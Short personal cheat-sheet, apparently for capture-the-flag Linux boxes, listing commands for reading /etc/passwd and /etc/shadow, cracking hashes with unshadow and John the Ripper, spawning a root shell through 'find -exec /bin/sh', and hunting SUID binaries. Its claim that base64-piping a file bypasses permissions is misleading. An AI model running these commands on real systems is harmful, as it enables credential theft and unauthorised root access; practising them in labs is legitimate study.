Imp Commands

Enumeration & Password Cracking

base64 | base64 --decode

base64 /etc/passwd | base64 --decode

(Use the above command to bypass sudo permission and see the file even in low privilege)

Then,

1. Copy All content of /etc/shadow to the shadow.txt file

2. Copy All content of /etc/passwd to the passwd.txt file

Then, Unshadow it -

sudo unshadow passwd.txt shadow.txt > cracked.txt

Then, Use JohnTheRipper to see all user's passwords

john --wordlist=/usr/share/wordlists/rockyou.txt cracked.txt

sudo find / -name "flag1.txt" --> Use to find files

sudo find . -exec /bin/sh ; -quit ---> bypass sudo permission

user.txt — how to find it? use find command. Type find / -type f -name user.txt 2> /dev/null

• -type f — you are telling find to look exclusively for files

• -name user.txt — instructing the find command to search for a file with the name “user.txt”

• 2> /dev/null — so error messages do not show up as part of the search result

Search for files with SUID permission, Which file is weird? We need to run the command find / -user root -perm /4000. What it means? It is looking for a file with SUID permission that can be run as root. We need to look carefully into the output of the command to find which file can be exploited to gain root access.